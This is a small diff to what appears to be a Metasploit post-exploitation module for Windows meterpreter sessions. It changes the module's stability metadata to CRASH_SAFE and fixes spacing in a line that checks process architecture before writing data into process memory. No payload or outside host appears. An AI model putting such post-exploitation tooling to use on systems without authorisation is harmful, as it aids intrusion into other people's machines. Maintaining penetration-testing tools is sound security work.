@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Post
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
         'Notes' => {
-          'Stability' => [],
+          'Stability' => [CRASH_SAFE],
           'Reliability' => [],
           'SideEffects' => []
         },
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Post
       #  enumerate all processes to find the one that we're are currently executing as,
       #  and then fetch the architecture attribute of that process by doing ["arch"]
       #  to check if it is an 32bits process or not.
-      if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      if session.sys.process.each_process.find { |i| i['pid'] == pid }['arch'] == 'x86'
         addr = [mem].pack('V')
         len = [data.length].pack('V')
 
